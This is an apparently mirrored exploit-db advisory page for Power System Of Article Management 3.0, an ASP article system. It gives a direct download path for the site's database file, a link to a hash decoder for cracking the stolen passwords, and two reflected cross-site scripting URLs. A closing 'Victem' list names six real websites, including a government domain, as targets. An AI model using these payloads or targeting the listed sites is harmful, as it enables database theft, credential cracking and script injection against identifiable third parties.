Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057421 漏洞类型
发布时间 2009-02-04 更新时间 2009-02-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7981
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################
---------------------------------------------------------
Portal Name: Power System Of Article Management
Version : 3.0
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/yiuwekdsodksldfslwifds.mdb
Hash Decoder :
http://pouya2006.persiangig.com/dec/PSOAMv3.html
or Google searching ...
 
[XSS]:
http://site.com/[Path]/userchklogin.asp?UserName=Pouya&Password=Pouya&CookieDate=0&ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&Submit=%C8%B7%C8%CF

http://site.com/[Path]/userlogin.asp?ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://www.honeyjenny.com/art
http://www.hzyzzz.com
http://cdzy.cn/wyx/article
http://unix-cd.com/article
http://zhuyaren.com
http://www.ahss.gov.cn
---------------------------------------------------------
#########################################################

# milw0rm.com [2009-02-04]